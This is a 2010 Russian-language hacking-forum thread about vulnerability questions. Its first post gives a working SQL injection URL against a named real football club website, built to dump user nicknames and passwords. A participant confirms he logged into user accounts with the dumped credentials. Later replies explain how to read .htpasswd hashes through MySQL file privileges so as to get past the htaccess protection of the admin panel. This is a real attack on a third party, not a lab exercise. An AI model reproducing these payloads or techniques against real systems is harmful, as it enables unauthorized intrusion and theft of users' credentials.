Ваши вопросы по уязвимостям.

16.07.2010, 22:21

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

boberko

http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,group_concat(nick,char(58),password),5,6,7+from+ users+--+

хотя не думаю что это таблица админов

𝕏 Twitter Reddit Telegram Копировать ссылку

16.07.2010, 22:30

boberko

Новичок

Регистрация: 24.01.2009

Сообщений: 10

С нами: 9102279

Репутация: 1

Konqi

это таблица простых пользователей, я заходил все пашет...для админов не подходит(

в бд этих данных точно нету, все пересмотрел не нашел...

возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

16.07.2010, 22:34

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от boberko

Konqi
єто таблица простых пользователей, я заходил все пашет...для админов не подходит(
в бд этих данных точно нету, все пересмотрел не нашел...
возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

если file_priv=Y и знаешь полный путь, то можешь читать файлы(скрипты, конфиги).

16.07.2010, 22:40

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

С нами: 10585560

Репутация: 1550

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от boberko

Gorev
, невижу ничего смешного, в бд логин и пароль для доступа нету...

какой нахрен смех? я тебе немекнул насчет бейсик авторизации...хоть погуглил бы перед тем как опять херню всякую постить...мде... знания участников форума с каждым днем стремительно уменьшаются...

где тот грей или джокестер, которые за такие вопросы из новичка делали чайника и ламера

16.07.2010, 23:12

Unknown

Новичок

Регистрация: 21.06.2005

Сообщений: 1

С нами: 10992741

Репутация: 0

Цитата:

Сообщение от Redwood

Есть ли способ передать GET запрос, чтобы в логах скобки не заменились на %3C %3E?

Кому передать ? Это ведь зависит от программы, как и каким способом сохраняет логи.

17.07.2010, 00:54

Dare

Новичок

Регистрация: 26.04.2010

Сообщений: 26

С нами: 8444531

Репутация: 53

Цитата:

Сообщение от None

это таблица простых пользователей, я заходил все пашет...для админов не подходит( в бд этих данных точно нету, все пересмотрел не нашел... возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

Что куда у тебя не подходит? все там норм просто админка под хтаццессом (

обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.

имхо: вопрос в разряд тупые )))

Горев реально прав, ребята давайте чуток читать )

17.07.2010, 04:05

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от Dare

Что куда у тебя не подходит? все там норм просто админка под хтаццессом (
обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.
имхо: вопрос в разряд тупые )))
Горев реально прав, ребята давайте чуток читать )

но если есть file_priv и знаешь путь к сайту то можно читать .htpasswd, а там лежат пароли(хеши(AFAIK md5(unix))) к .htaccess

17.07.2010, 04:48

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от [Feldmarschall

"]
[Feldmarschall] said:
file_priv не для чтения файлов а для инклюдинга.

представим что ты прав, "инклудим" .htpasswd,

но это на сколько я знаю не script,a файл содержащий login:hash

и по твоему этот файл должен исполнятся?

я конечно этому не верю что file_priv инклудит, но если даже это было бы так, то в нашем случай инклуд=читалка, так как в файле нету кода.

но как мы знаем я всегда не прав,так что простите за дезинформацию.

ну а если серьезно то лучше бы ты этого не сказал.